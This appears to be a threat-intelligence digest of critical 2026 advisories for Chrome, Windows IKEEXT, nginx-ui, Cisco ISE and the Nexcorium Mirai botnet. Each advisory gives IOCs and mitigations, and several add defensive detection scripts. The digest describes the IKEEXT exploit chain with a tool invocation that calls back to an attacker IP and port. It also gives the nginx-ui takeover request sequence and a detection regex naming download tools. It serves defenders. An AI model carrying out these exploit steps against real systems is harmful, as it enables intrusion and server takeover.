Google Chrome - CVE-2026-6296
A critical heap buffer overflow, CVE-2026-6296 (CVSS v3.1 score 9.6), exists in ANGLE (Almost Native Graphics Layer Engine), the graphics component of Google Chrome. A remote, unauthenticated attacker who gets a victim to open a specially crafted HTML page can corrupt memory in the renderer process and execute arbitrary code, with a potential sandbox escape. The only user interaction required is visiting the malicious page; no privileges are needed. Affected versions are Google Chrome before 147.0.7727.101 on Windows and Linux, and before 147.0.7727.102 on macOS. A patch is available and there is no workaround: update Chrome to 147.0.7727.101 or later on Windows/Linux and to 147.0.7727.102 or later on macOS.
Severity: Critical
Threat Details and IOCs
| Malware: | Coruna, CryptoWaters, DarkSword, Ghostblade |
|---|---|
| CVEs: | CVE-2026-6296, CVE-2026-6297, CVE-2026-6298, CVE-2026-6299, CVE-2026-6300, CVE-2026-6301, CVE-2026-6302, CVE-2026-6303, CVE-2026-6304, CVE-2026-6305, CVE-2026-6306, CVE-2026-6307, CVE-2026-6308, CVE-2026-6309, CVE-2026-6310, CVE-2026-6311, CVE-2026-6312, CVE-2026-6313, CVE-2026-6314, CVE-2026-6315, CVE-2026-6316, CVE-2026-6317, CVE-2026-6318, CVE-2026-6319, CVE-2026-6358, CVE-2026-6359, CVE-2026-6360, CVE-2026-6361, CVE-2026-6362, CVE-2026-6363, CVE-2026-6364 |
| Technologies: | Apple macOS, Google Chrome, Linux, Microsoft Windows |
| Attacker Hashes: | 86ac1f1587b71893ed2ad792cd7dde32, c6eed09fc8b174b0f3eebedcceb1e792 |
| Victim Industries: | Healthcare |
Mitigation Advice
- Update all Google Chrome installations on Windows and Linux to version 147.0.7727.101 or higher.
- Update all Google Chrome installations on macOS to version 147.0.7727.102 or higher.
- Use asset inventory or vulnerability scanning tools to identify all devices with Google Chrome versions older than 147.0.7727.101 (for Windows/Linux) or 147.0.7727.102 (for macOS).
- Advise all users to exercise caution when browsing, especially when clicking links in emails or visiting unfamiliar websites, until browser updates are fully deployed.
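The inventory check above is easy to get wrong when version strings are compared lexically ("147.0.7727.99" sorts after "147.0.7727.101" as text) or when the macOS threshold is confused with the Windows/Linux one. The following is an added example, not code from the advisory or from Google: it compares Chrome builds numerically against the per-platform fixed builds stated above. The inventory rows and hostnames are constructed for the demonstration.

```python
from typing import Dict, List, Tuple

# Fixed builds from the advisory: Windows/Linux 147.0.7727.101, macOS 147.0.7727.102
FIXED_BUILD = {
    "windows": "147.0.7727.101",
    "linux": "147.0.7727.101",
    "macos": "147.0.7727.102",
}


def parse_version(v: str) -> Tuple[int, ...]:
    """Split a dotted Chrome version into integers, normalised to four fields."""
    parts = [int(p) for p in v.strip().split(".")]
    return tuple((parts + [0] * 4)[:4])


def is_vulnerable(platform: str, version: str) -> bool:
    """True when the installed build is numerically older than the fixed build for that platform."""
    key = platform.strip().lower()
    if key not in FIXED_BUILD:
        raise ValueError(f"unknown platform {platform!r}")
    return parse_version(version) < parse_version(FIXED_BUILD[key])


def find_vulnerable(inventory: List[Dict[str, str]]) -> List[str]:
    """Return the hosts from an inventory export that still run a vulnerable Chrome."""
    return [h["host"] for h in inventory if is_vulnerable(h["platform"], h["chrome_version"])]


# Constructed inventory rows (not real hosts). ws-02 is the lexical trap: ".99" > ".101" as a
# string but older as a version. mac-01 is fixed on Windows/Linux but not on macOS.
SAMPLE_INVENTORY = [
    {"host": "ws-01", "platform": "windows", "chrome_version": "147.0.7727.101"},
    {"host": "ws-02", "platform": "windows", "chrome_version": "147.0.7727.99"},
    {"host": "mac-01", "platform": "macos", "chrome_version": "147.0.7727.101"},
    {"host": "mac-02", "platform": "macos", "chrome_version": "147.0.7727.102"},
    {"host": "lx-01", "platform": "linux", "chrome_version": "146.0.7680.200"},
    {"host": "lx-02", "platform": "linux", "chrome_version": "148.0.7800.1"},
]
```

Feed it the CSV or JSON export from your asset inventory after mapping the OS field onto the three platform keys; anything not in `FIXED_BUILD` raises rather than silently passing, which is the behaviour you want for unexpected platforms.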
Compliance Best Practices
- Implement or mature an automated software patch management system to ensure timely deployment of security updates for all third-party applications, particularly web browsers.
- Deploy or configure a web filtering solution to block access to known malicious, suspicious, and uncategorized websites.
- Tune Endpoint Detection and Response (EDR) policies to detect and alert on suspicious process behaviors originating from web browsers, such as spawning command-line interpreters or writing executable files to disk.
- Enforce a policy of least privilege by removing local administrator rights from standard user accounts to limit the impact of successful code execution vulnerabilities.
Exploit for CVE-2026-33824
A remote code execution exploit for CVE-2026-33824 (CVSS 9.8), dated 2026-04-16, targets a double-free vulnerability in the Windows IKE Extension service (IKEEXT). It affects unpatched builds of Windows 10 (1607–22H2), Windows 11 (22H2–26H1) and Windows Server 2016–2025, and works remotely over UDP port 500 or 4500 without authentication or user interaction. The exploit sends a four-packet IKEv2 `SA_INIT` sequence carrying malformed Notify and Proposal payloads, which triggers the double-free in `ikeext!IKEEXT::ProcessIKEPayload`. Heap grooming over 16 parallel UDP flows steers the freed chunk into a controlled freelist, yielding an arbitrary write primitive that overwrites the next pointer; from there a ROP chain disables CFG and CET and pivots execution into user-controlled memory, running the supplied raw shellcode or PE payload in the IKEEXT process context (equivalent to Local System), so the result is a full SYSTEM shell without interrupting the service. Because it bypasses the default mitigations, the exploit is most useful for initial access to internet-facing VPN/IPsec hosts in enterprise environments. Running the tool requires root on the attacker machine for raw sockets; the invocation takes the form `./ike_rce -t <victim_IP> -p <port> -s <shellcode_file> -l <attacker_IP> <attacker_port> --groom N`. The tool is intended strictly for authorized red team operations, penetration testing and security research with explicit permission.
Severity: Critical
Threat Details and IOCs
| Malware: | Meterpreter |
|---|---|
| CVEs: | CVE-2026-33824 |
| Technologies: | Microsoft Windows, Microsoft Windows 11 Enterprise, Microsoft Windows Internet Key Exchange, Microsoft Windows Server |
| Attacker Domains: | satoshidisk[.]com |
| Attacker URLs: | hxxps[://]tinyurl[.]com/8htp9399 |
| Victim Countries: | United States |
Mitigation Advice
- Immediately deploy the April 2026 Microsoft security updates for CVE-2026-33824 to all affected Windows 10, Windows 11, and Windows Server systems, prioritizing internet-facing servers.
- On perimeter firewalls, create a rule to block all inbound traffic on UDP ports 500 and 4500 to any assets that do not explicitly require IKEv2 for VPN or IPsec functions.
- For essential VPN servers that require IKEv2, update firewall rules to only allow inbound UDP traffic on ports 500 and 4500 from the specific IP addresses of authorized remote peers or branch offices.
- Identify all systems running the 'IKE and AuthIP IPsec Keying Modules' (IKEEXT) service. If the service is not essential for business operations, disable and stop the service.
- Configure network monitoring tools and SIEM to alert on anomalous or malformed IKEv2 SA_INIT packets destined for UDP ports 500 and 4500, and investigate alerts for signs of exploit attempts.
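The last item asks for alerting on malformed IKEv2 `SA_INIT` traffic, which in practice means checking that the header and the payload chain are internally consistent before the packet ever reaches the service. The following is an added example, not code from the exploit or from any vendor, and it is not a signature for CVE-2026-33824 (the page gives no packet-level signature): it is a generic structural sanity check for one UDP datagram, using the header layout, payload type numbers and proposal format from RFC 7296. `MAX_PAYLOADS` is an arbitrary bound, and the two sample datagrams are constructed rather than captured.

```python
import struct
from typing import List

# IKEv2 constants from RFC 7296 (header: section 3.1, payload types: section 3.2).
IKE_HEADER_LEN = 28
IKE_SA_INIT = 34
PAYLOAD_NONE, PAYLOAD_SA, PAYLOAD_KE = 0, 33, 34
PAYLOAD_NONCE, PAYLOAD_NOTIFY = 40, 41
FLAG_INITIATOR, FLAG_RESPONSE = 0x08, 0x20
MAX_PAYLOADS = 64  # assumption: a sane upper bound on the payload chain length


def _check_proposals(sa_body: bytes) -> List[str]:
    """Validate the proposal substructures inside an SA payload body (RFC 7296 section 3.3.1)."""
    out, off = [], 0
    while True:
        if len(sa_body) - off < 8:
            out.append("SA payload: truncated proposal header")
            break
        more, _, plen, num, _proto, spi_size, _ntrans = struct.unpack("!BBHBBBB", sa_body[off:off + 8])
        if plen < 8 or off + plen > len(sa_body):
            out.append(f"SA payload: proposal {num} length {plen} overruns payload")
            break
        if 8 + spi_size > plen:
            out.append(f"SA payload: proposal {num} SPI size {spi_size} exceeds proposal")
        off += plen
        if more == 0:  # 0 = last proposal, 2 = more proposals follow
            break
    return out


def check_ikev2_datagram(data: bytes) -> List[str]:
    """Return structural anomalies in one UDP payload; an empty list means the framing is consistent."""
    if len(data) < IKE_HEADER_LEN:
        return ["datagram shorter than the 28-byte IKEv2 header"]
    findings: List[str] = []
    _spi_i, spi_r, next_type, version, exch, flags, msg_id, length = struct.unpack(
        "!QQBBBBII", data[:IKE_HEADER_LEN])
    if version >> 4 != 2:
        findings.append(f"unexpected IKE major version {version >> 4}")
    if length != len(data):
        findings.append(f"header length {length} != datagram length {len(data)}")
    if exch == IKE_SA_INIT:
        if msg_id != 0:
            findings.append(f"IKE_SA_INIT with non-zero message ID {msg_id}")
        if flags & FLAG_INITIATOR and not flags & FLAG_RESPONSE and spi_r != 0:
            findings.append("initiator IKE_SA_INIT request with non-zero responder SPI")
    seen, off, count = set(), IKE_HEADER_LEN, 0
    while next_type != PAYLOAD_NONE:
        count += 1
        if count > MAX_PAYLOADS or off + 4 > len(data):
            findings.append(f"payload chain runs past the datagram or exceeds {MAX_PAYLOADS} payloads")
            break
        ptype = next_type
        next_type, _crit, plen = struct.unpack("!BBH", data[off:off + 4])
        if plen < 4 or off + plen > len(data):
            findings.append(f"payload type {ptype} declares length {plen}, inconsistent with datagram")
            break
        body = data[off + 4:off + plen]
        seen.add(ptype)
        if ptype == PAYLOAD_SA:
            findings.extend(_check_proposals(body))
        elif ptype == PAYLOAD_NOTIFY:
            # Notify body: Protocol ID (1), SPI Size (1), Notify Message Type (2), SPI, data
            if len(body) < 4:
                findings.append("Notify payload shorter than its 4-byte fixed header")
            elif 4 + body[1] > len(body):
                findings.append(f"Notify SPI size {body[1]} exceeds payload")
        off += plen
    if exch == IKE_SA_INIT and not {PAYLOAD_SA, PAYLOAD_KE, PAYLOAD_NONCE} <= seen:
        findings.append("IKE_SA_INIT missing one of the mandatory SA/KE/Nonce payloads")
    return findings


def _payload(next_type: int, body: bytes) -> bytes:
    return struct.pack("!BBH", next_type, 0, 4 + len(body)) + body


def build_sa_init(first_type: int, payloads: List[bytes], spi_r: int = 0) -> bytes:
    """Assemble an initiator IKE_SA_INIT request from pre-built payloads (test scaffolding)."""
    body = b"".join(payloads)
    return struct.pack("!QQBBBBII", 0x1122334455667788, spi_r, first_type, 0x20,
                       IKE_SA_INIT, FLAG_INITIATOR, 0, IKE_HEADER_LEN + len(body)) + body


# Constructed samples, not captured traffic. GOOD: one IKE proposal, a KE payload for DH group 14
# with placeholder key data, and a 16-byte nonce.
GOOD = build_sa_init(PAYLOAD_SA, [
    _payload(PAYLOAD_KE, struct.pack("!BBHBBBB", 0, 0, 8, 1, 1, 0, 0)),
    _payload(PAYLOAD_NONCE, struct.pack("!HH", 14, 0) + b"\x41" * 32),
    _payload(PAYLOAD_NONE, b"\x42" * 16),
])
# BAD: responder SPI already set, a proposal claiming 4096 bytes, and a Notify whose SPI size (200)
# cannot fit in its 8-byte body; the mandatory KE and Nonce payloads are absent.
BAD = build_sa_init(PAYLOAD_SA, [
    _payload(PAYLOAD_NOTIFY, struct.pack("!BBHBBBB", 0, 0, 4096, 1, 1, 0, 0)),
    _payload(PAYLOAD_NONE, struct.pack("!BBH", 1, 200, 14) + b"\x00" * 4),
], spi_r=0xDEADBEEF)
```

Run `check_ikev2_datagram` over the UDP payloads a sensor sees on ports 500 and 4500 and raise an alert when it returns anything; the check stops walking the chain at the first length that cannot be trusted, so a single malformed header cannot make the parser itself read out of bounds. Port 4500 carries a 4-byte non-ESP marker before the IKE header, which must be stripped first.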
Compliance Best Practices
- Review and formalize the organization's vulnerability management policy to mandate patching of critical, internet-facing vulnerabilities with known exploits within a 72-hour service level agreement (SLA).
- Design and implement a network DMZ for all internet-facing services, including VPN concentrators. Enforce a strict, default-deny firewall policy that limits communication from the DMZ to the internal network to only absolutely necessary protocols and destinations.
- Establish a formal, quarterly attack surface review process to audit all internet-facing systems, identify and document all exposed ports and services, and remove or disable any that are not business-essential.
- Implement a default-deny egress filtering policy on firewalls for all server segments, especially the DMZ. Explicitly allow only required outbound traffic for patching, logging, and other approved business functions.
- Initiate a project to evaluate modern VPN technologies, such as WireGuard or vendor-specific SSL VPNs, as potential replacements for the existing IKEv2-based infrastructure to reduce reliance on legacy protocols.
Actively Exploited nginx-ui Flaw (CVE-2026-33032) Enables Full Nginx Server Takeover
A critical authentication bypass vulnerability, CVE-2026-33032 (CVSS score: 9.8), codenamed MCPwn, has been identified in nginx-ui, a third-party, open-source NGINX management tool not maintained by F5, and is under active exploitation. This flaw allows threat actors to achieve full Nginx server takeover by exploiting the `/mcp_message` endpoint, which, by default, lacks authentication and has an empty IP whitelist, effectively allowing all network attackers to invoke Model Context Protocol (MCP) tools. Attackers can establish a session via an HTTP GET request to `/mcp` to obtain a session ID, then use an HTTP POST request to `/mcp_message` with the session ID to modify Nginx configuration files, reload the server, intercept traffic, and harvest administrator credentials without authentication. The vulnerability was addressed in version 2.3.4, released on March 15, 2026, with recommended workarounds including adding `middleware.AuthRequired()` to the `/mcp_message` endpoint or changing the IP allowlisting default to "deny-all." Approximately 2,689 nginx-ui instances are publicly exposed, primarily in China, the U.S., Indonesia, Germany, and Hong Kong. This vulnerability follows the discovery of two related flaws, CVE-2026-27825 (CVSS 9.1) and CVE-2026-27826 (CVSS 8.2), dubbed MCPwnfluence, in the Atlassian MCP server (`mcp-atlassian`), which can be chained to achieve unauthenticated remote code execution from the local area network. These involve an arbitrary file write vulnerability and a Server-Side Request Forgery (SSRF), both fixed in `mcp-atlassian` version 0.17.0.
Severity: Critical
Threat Details and IOCs
| Malware: | AgingFly, AMOS, Atomic macOS Stealer, Atomic Stealer, GHOSTBLADE, GHOSTKNIFE, GHOSTSABER, Mirax, Mirax Bot |
|---|---|
| CVEs: | CVE-2026-27825, CVE-2026-27826, CVE-2026-27944, CVE-2026-33026, CVE-2026-33030, CVE-2026-33032, CVE-2026-3888 |
| Technologies: | Amazon Web Services, Canonical snapd, Cloudflare, Docker, Linux, NGINX, Nginx UI |
| Threat Actors: | ShinyHunters, UAC0247 |
| Attacker Domains: | attacker[.]com |
| Attacker URLs: | /api/backup, hxxp[://]attacker[.]com, /mcp_message |
| Victim Industries: | Consulting Services, Education, Financial Services, Government, Healthcare, Information Technology, IT and DevOps, Technology Hardware |
| Victim Countries: | China, France, Germany, Hong Kong, Indonesia, United States |
Mitigation Advice
- Immediately update all instances of nginx-ui to version 2.3.4 or later to remediate the authentication bypass vulnerability (CVE-2026-33032).
- Use a firewall or network access control lists (ACLs) to block all external access to the nginx-ui management interface. Access should only be permitted from trusted internal IP addresses.
- If patching is not immediately feasible, apply the recommended workaround of wrapping the '/mcp_message' route with 'middleware.AuthRequired()' so that the endpoint enforces authentication. This is a change to the route registration in the nginx-ui source (the project is written in Go), so it requires rebuilding and redeploying the binary rather than editing a configuration file.
- As an alternative workaround, change the IP allowlist default for the '/mcp_message' endpoint from the empty list (which admits every source) to deny-all, then add only trusted management addresses.
- Scan internal and external networks to identify all deployed instances of nginx-ui. Review web server and network logs for anomalous POST requests to the '/mcp_message' endpoint originating from untrusted IP addresses.
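The log review in the last item can be automated. The following is an added example, not code from nginx-ui or from any of the cited write-ups: it parses nginx "combined" access-log lines, ignores trusted management ranges, and flags every untrusted POST to `/mcp_message`, noting whether the same client fetched `/mcp` shortly before (the session-setup step described above). The trusted ranges, the 10-minute window and the log lines are constructed assumptions.

```python
import re
from datetime import datetime, timedelta
from ipaddress import ip_address, ip_network
from typing import Dict, List, Optional

# nginx "combined" log format: client, ident, user, [time], "request", status, bytes, "referer", "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<bytes>\d+|-)')
TIME_FMT = "%d/%b/%Y:%H:%M:%S %z"
TRUSTED = [ip_network("10.0.0.0/8"), ip_network("192.168.0.0/16")]  # assumption: management ranges
WINDOW = timedelta(minutes=10)  # assumption: how close GET /mcp must be to count as session setup


def parse_line(line: str) -> Optional[Dict]:
    m = LOG_RE.match(line)
    if not m:
        return None
    return {"ip": m["ip"], "time": datetime.strptime(m["time"], TIME_FMT),
            "method": m["method"], "path": m["path"].split("?", 1)[0], "status": int(m["status"])}


def is_trusted(ip: str) -> bool:
    try:
        addr = ip_address(ip)
    except ValueError:
        return False
    return any(addr in net for net in TRUSTED)


def find_mcp_abuse(lines: List[str]) -> List[Dict]:
    """Flag untrusted clients posting to /mcp_message; record whether a GET /mcp preceded it."""
    last_session_get: Dict[str, datetime] = {}
    hits: List[Dict] = []
    for raw in lines:
        ev = parse_line(raw)
        if ev is None or is_trusted(ev["ip"]):
            continue
        if ev["method"] == "GET" and ev["path"] == "/mcp":
            last_session_get[ev["ip"]] = ev["time"]
        elif ev["method"] == "POST" and ev["path"] == "/mcp_message":
            t0 = last_session_get.get(ev["ip"])
            hits.append({"ip": ev["ip"], "time": ev["time"], "status": ev["status"],
                         "session_setup_seen": t0 is not None and ev["time"] - t0 <= WINDOW})
    return hits


# Constructed log lines (not from a real incident). 203.0.113.7 follows the GET /mcp then
# POST /mcp_message sequence; 10.10.1.5 is inside a trusted range; 198.51.100.9 posts blind.
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Apr/2026:10:15:01 +0000] "GET /mcp HTTP/1.1" 200 512 "-" "python-requests/2.31"',
    '203.0.113.7 - - [01/Apr/2026:10:15:03 +0000] "POST /mcp_message?sessionId=abc123 HTTP/1.1" 202 0 "-" "python-requests/2.31"',
    '10.10.1.5 - - [01/Apr/2026:10:16:00 +0000] "POST /mcp_message?sessionId=def456 HTTP/1.1" 202 0 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [01/Apr/2026:10:20:00 +0000] "POST /mcp_message HTTP/1.1" 403 0 "-" "curl/8.5.0"',
    '203.0.113.7 - - [01/Apr/2026:10:21:00 +0000] "GET /api/backup HTTP/1.1" 401 0 "-" "python-requests/2.31"',
]
```

Do not filter on the response status: a 202 from an unpatched instance and a 401 or 403 from a patched one both tell you who is probing, and the first case is the one you need to follow up with a review of the Nginx configuration files on that host.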
Compliance Best Practices
- Establish and enforce a security policy that requires all new software and services to be configured with a 'deny-by-default' or 'fail-safe' security posture, explicitly prohibiting permissive defaults like empty whitelists that allow universal access.
- Implement network segmentation to isolate all system management interfaces, including web UIs like nginx-ui, from the public internet and general corporate networks. Mandate that access to these interfaces requires use of a VPN with multi-factor authentication.
- Incorporate a mandatory security review process for any third-party plugins, modules, or integrations before they are deployed into production to ensure they properly inherit and enforce the security controls of the parent application.
- Refine the vulnerability management program to prioritize remediation based on evidence of active exploitation and asset exposure, establishing strict service-level agreements (SLAs) for patching critical, internet-facing systems.
https://buaq.net/go-410904.html
https://cyberpress.org/public-poc-exploit-released-for-nginx-ui-backup-restore-vulnerability/
https://cyberveille.esante.gouv.fr/alertes/nginx-cve-2026-33032-2026-03-31
https://gbhackers.com/nginx-ui-flaw-actively-exploited/
https://securereading.com/nginx-ui-vulnerability-cve-2026-33032/
https://securityonline.info/nginx-ui-poc-disclosed-critical-vulnerability-cve-2026-33032/
https://sploitus.com/exploit?id=B098EB78-C7D7-5BEA-86E2-ABC4FE65CA5D
https://thehackernews.com/2026/04/critical-nginx-ui-vulnerability-cve.html
https://www.hackthebox.com/blog/CVE-2026-27944-CVE-2026-3888
https://www.infosecurity-magazine.com/news/nginx-ui-mcp-flaw-actively/
https://www.thehackerwire.com/nginx-ui-critical-unauthenticated-service-takeover-cve-2026-33032/
https://www.thehackerwire.com/nginx-ui-idor-allows-cross-user-resource-access/
Cisco Identity Services Engine Remote Code Execution Vulnerabilities
Multiple critical remote code execution (RCE) vulnerabilities, identified as CVE-2026-20180 and CVE-2026-20186 with a CVSS score of 9.9, affect Cisco Identity Services Engine (ISE). These vulnerabilities allow an authenticated, remote attacker with at least Read Only Admin credentials to execute arbitrary commands on the underlying operating system. The flaws are due to insufficient validation of user-supplied input, enabling an attacker to send a crafted HTTP request to gain user-level access and potentially elevate privileges to root. In single-node ISE deployments, successful exploitation could also lead to a denial of service condition. Affected versions include ISE releases earlier than 3.2, 3.2, 3.3, and 3.4, while Cisco ISE 3.5 is not vulnerable. There are no workarounds available; therefore, users must upgrade to fixed software releases: 3.2 Patch 8, 3.3 Patch 8, or 3.4 Patch 4. These vulnerabilities were discovered during internal security testing by the Cisco Advanced Security Initiatives Group (ASIG).
Severity: Critical
Threat Details and IOCs
| CVEs: | CVE-2026-20147, CVE-2026-20180, CVE-2026-20184, CVE-2026-20186, CVE-2026-22564 |
|---|---|
| Technologies: | Cisco Identity Services Engine |
| Victim Industries: | Information Technology, Telecommunications |
| Victim Countries: | India, United Kingdom, United States |
Mitigation Advice
- Identify all Cisco ISE instances and upgrade them to a fixed software version immediately. For ISE version 3.2, apply Patch 8. For version 3.3, apply Patch 8. For version 3.4, apply Patch 4. For any version earlier than 3.2, migrate to a fixed release.
- Conduct an immediate audit of all accounts with administrative access to Cisco ISE, including 'Read Only' roles. Disable any dormant or unnecessary accounts and enforce a password rotation for all remaining privileged accounts.
- Enforce multi-factor authentication (MFA) on all administrative accounts that can log in to the Cisco ISE management interface.
- Update firewall rules to restrict network access to the Cisco ISE management web interface. Only allow connections from a limited set of authorized IP addresses, such as a secure management subnet or specific administrative workstations.
- Increase monitoring of Cisco ISE access logs. Investigate any anomalous login patterns or suspicious HTTP requests directed at the management interface, especially from unexpected source IP addresses.
Compliance Best Practices
- Establish a formal vulnerability management program that includes asset inventory, regular scanning, risk-based prioritization, and defined service-level agreements (SLAs) for patching critical infrastructure like Cisco ISE.
- Implement a quarterly access review process for all privileged accounts on critical network infrastructure. The goal is to enforce the principle of least privilege and ensure that accounts, especially non-interactive or read-only ones, have the minimum necessary permissions.
- Design and implement a secure management network zone, isolated from general user and production server traffic, to host the management interfaces of all critical infrastructure, including Cisco ISE.
Tracking Mirai Variant Nexcorium: A Vulnerability-Driven IoT Botnet Campaign
A new Mirai variant, Nexcorium, is actively exploiting CVE-2024-3721, an OS command injection vulnerability in TBK DVR-4104 and DVR-4216 devices, in a campaign attributed to the "Nexus Team." The infection chain involves a downloader script (`dvr`) fetching multi-architecture Nexcorium malware, which then displays "nexuscorp has taken control" upon execution. This Mirai-like malware utilizes XOR-encoded configurations for its C2 server (`r3brqw3d[.]b0ats[.]top`), persistence commands, and a hard-coded brute-force wordlist, also incorporating an exploit for CVE-2017-17215 targeting Huawei HG532 devices. Nexcorium establishes persistence through multiple mechanisms, including modifying `/etc/inittab` and `/etc/rc.local`, creating a `systemd` service (`/etc/systemd/system/persist.service`), and adding `crontab` entries, subsequently deleting its original binary to evade analysis. The botnet supports diverse DDoS attack methods, such as UDP, TCP ACK/SYN/PSH/URG, SMTP, VSE query, and UDP blast floods. Indicators of compromise include C2 hosts `84[.]200[.]87[.]36`, `176[.]65[.]148[.]186`, and file hashes like `696aeb6321313919f0a41a520e6fa715450bbfb271a9add1e54efe16484a9c35` for the downloader.
Severity: Critical
Threat Details and IOCs
| Malware: | Mirai, Nexcorium, nexuscorp, Okiru, OMG, Owari, Satori, Wicked |
|---|---|
| CVEs: | CVE-2017-17215, CVE-2024-3721 |
| Technologies: | Huawei HG532, Linux, TBK DVR |
| Attacker IPs: | 176[.]65[.]148[.]186, 84[.]200[.]87[.]36 |
| Attacker Domains: | r3brqw3d[.]b0ats[.]top |
| Attacker Hashes: | 37132e804ccb3fc4ba1f72205da70c3d7a6e66b43178707a9d8ee1156d815c21, 696aeb6321313919f0a41a520e6fa715450bbfb271a9add1e54efe16484a9c35 |
| Victim Industries: | Cloud Infrastructure, Financial Services, Government, Industrials, Retail |
| Victim Countries: | China, Taiwan |
Mitigation Advice
- Add the IP addresses 84.200.87.36 and 176.65.148.186 to your firewall's blocklist.
- Add the domain r3brqw3d.b0ats.top to your DNS filter or web proxy blocklist.
- Add all file hashes listed in the article's IOC section to your Endpoint Detection and Response (EDR) or antivirus solution's blocklist.
- Scan your network for TBK DVR-4104 and DVR-4216 devices and determine if they are vulnerable to CVE-2024-3721. Isolate any identified vulnerable devices from the network immediately.
- Scan your network for Huawei HG532 devices and determine if they are vulnerable to CVE-2017-17215. Isolate any identified vulnerable devices from the network.
- Verify that your Intrusion Prevention System (IPS) has signatures enabled to detect and block exploitation attempts against CVE-2024-3721, such as Fortinet's signature 55717.
- Query firewall, web proxy, and web server logs for the HTTP header 'X-Hacked-By' to identify systems that may have been targeted or compromised.
- On suspect Linux-based IoT devices, inspect the '/etc/inittab' and '/etc/rc.local' files for unauthorized modifications or additions.
- On suspect Linux-based IoT devices, check for the existence of the file '/etc/systemd/system/persist.service'.
- On suspect Linux-based IoT devices, review system and user crontabs for newly created or suspicious scheduled jobs.
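The three device checks above can be run as one triage pass over a mounted firmware image or a live root. The following is an added example, not code from the write-up or from any vendor: it looks for the `persist.service` unit named in the analysis, greps `/etc/inittab` and `/etc/rc.local` for lines that launch from writable locations or pull remote content, and walks the usual crontab locations. The crontab paths and the suspicious-pattern list are assumptions; the downloader name `dvr` is deliberately not matched on, since a DVR will have legitimate binaries with that name. The sample root is constructed in a temporary directory so the script runs offline.

```python
import re
import tempfile
from pathlib import Path
from typing import Dict, List

# Artifacts named in the write-up; crontab locations are common Linux/BusyBox paths (assumption)
PERSIST_UNIT = "etc/systemd/system/persist.service"
INIT_FILES = ["etc/inittab", "etc/rc.local"]
CRON_FILES = ["etc/crontab"]
CRON_DIRS = ["var/spool/cron/crontabs", "var/spool/cron", "etc/cron.d"]
# Boot/cron lines that fetch from the network or execute from writable storage (assumption)
SUSPICIOUS = re.compile(r"(wget|curl|tftp|/tmp/|/dev/shm|nexus)", re.IGNORECASE)


def _grep(path: Path, rel: str, skip_comments: bool) -> List[str]:
    out = []
    for n, line in enumerate(path.read_text(errors="replace").splitlines(), 1):
        if skip_comments and (not line.strip() or line.lstrip().startswith("#")):
            continue
        if SUSPICIOUS.search(line):
            out.append(f"{rel}:{n}: {line.strip()}")
    return out


def triage(root: str) -> Dict[str, List[str]]:
    """Collect Nexcorium-style persistence indicators beneath a filesystem root."""
    base = Path(root)
    findings: Dict[str, List[str]] = {"unit": [], "init": [], "cron": []}
    unit = base / PERSIST_UNIT
    if unit.is_file():
        findings["unit"].append(f"{PERSIST_UNIT}: {unit.read_text(errors='replace').strip()[:120]}")
    for rel in INIT_FILES:
        if (base / rel).is_file():
            findings["init"].extend(_grep(base / rel, rel, skip_comments=False))
    cron_paths = [base / f for f in CRON_FILES]
    for d in CRON_DIRS:
        if (base / d).is_dir():
            cron_paths.extend(c for c in (base / d).iterdir() if c.is_file())
    for p in cron_paths:
        if p.is_file():
            findings["cron"].extend(_grep(p, str(p.relative_to(base)), skip_comments=True))
    return findings


def build_sample_root(root: str) -> None:
    """Construct a fake root with one of each artifact (sample data, not a real image)."""
    base = Path(root)
    (base / "etc/systemd/system").mkdir(parents=True)
    (base / PERSIST_UNIT).write_text(
        "[Service]\nExecStart=/tmp/.x/dvr\nRestart=always\n[Install]\nWantedBy=multi-user.target\n")
    (base / "etc/inittab").write_text("::sysinit:/etc/init.d/rcS\n::respawn:/tmp/.x/dvr\n")
    (base / "etc/rc.local").write_text("#!/bin/sh\nexit 0\n")
    (base / "var/spool/cron/crontabs").mkdir(parents=True)
    (base / "var/spool/cron/crontabs/root").write_text("# m h dom mon dow\n@reboot /tmp/.x/dvr\n")


def run_demo() -> Dict[str, List[str]]:
    """Build the sample root in a temporary directory and triage it."""
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_root(tmp)
        return triage(tmp)
```

Point `triage()` at the mount point of an extracted firmware image or at `/` on a live device; because the malware deletes its original binary, the persistence entries are often the only durable evidence left, so pull copies of the matched files before rebooting or reimaging.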
Compliance Best Practices
- Design and implement a network segmentation project to place all IoT devices, including DVRs and cameras, on an isolated network segment with strict firewall rules limiting inbound and outbound communication.
- Implement a corporate policy and perform configuration hardening to disable the Telnet service on all network devices and servers, enforcing the use of SSH for secure management.
- Enforce a strict policy that requires changing all default credentials on any new device, server, or software during its initial setup and deployment.
- Establish a formal vulnerability management program that includes asset inventory, regular scanning, risk-based prioritization, and defined SLAs for patching.
- Configure firewall egress filtering rules to deny all outbound traffic by default, especially from the IoT network segment, and only permit traffic required for essential functions on approved ports and destinations.
- Develop and maintain a comprehensive asset inventory of all network-connected devices, particularly IoT and OT systems, to ensure all assets are included in security monitoring and vulnerability management.